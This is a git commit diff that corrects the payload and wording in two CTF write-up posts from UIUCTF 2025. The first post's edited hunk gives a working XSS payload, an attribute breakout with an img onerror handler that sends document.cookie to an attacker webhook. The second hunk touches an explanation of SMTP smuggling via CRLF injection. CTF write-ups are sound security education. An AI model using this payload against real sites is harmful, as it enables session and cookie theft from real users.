fixed payload and punctuation

Author: valenter

content/posts/uiuctf25-ruler-of-the-universe/index.md

@@ -111,25 +111,25 @@ but `replace` only takes care of the first instance of the character in a string
 Knowing all this, and with a bit of trial and error, we can craft a working payload:
 
 ```js
-crewMessage = img"" /><img src=x onerror="alert(1)" x="
+crewMessage = "" /><img src=x onerror="alert(1)" x="
 ```
 
 During serialization:
-- the first `"` in `img""` becomes `&quot;`
-- the second `"` closes the `img` attribute
+- the first `"` in `""` becomes `&quot;`
+- the second `"` closes the `input` attribute
 
 the final markup becomes:
 
 ```js
-<input … placeholder="Update your message: img&quot;"
+<input … placeholder="Update your message: &quot;"
 />
 <img src=x onerror="alert(1)" x=>
 ```
 
 Now it's only a matter of adapting it to our purposes:
 
 ```js
-img"" /><img src=x onerror="fetch(\'%s?c=\'+encodeURIComponent(document.cookie))" x="
+"" /><img src=x onerror="fetch(\'%s?c=\'+encodeURIComponent(document.cookie))" x="
 ```
 
 Finally, we encode it into the full URL and send a POST request with the link to the Admin Bot to visit the page and retrieve the flag, which is in the bot's cookies, by forwarding it to our webhook:

content/posts/uiuctf25-supermassive-black-hole/index.md

@@ -130,7 +130,7 @@ But since `fix_eols` is deactivated, this is vulnerable to **CRLF injection**.
 
 ## Examining the vulnerability
 
-We can use `\n.\r\n`, a.k.a *LF‑dot‑CRLF*, to close our crafted message, the SMTP server will recognize dot-only line as end-of-DATA, and everything that follows (`MAIL FROM:…`, `RCPT TO:…`, etc.) will be interpreted  as new SMTP commands.
+We can use `\n.\r\n`, a.k.a *LF‑dot‑CRLF*, to close our crafted message, the SMTP server will recognize a dot-only line as end-of-DATA, and everything that follows (`MAIL FROM:…`, `RCPT TO:…`, etc.) will be interpreted  as new SMTP commands.
 
 #### The payload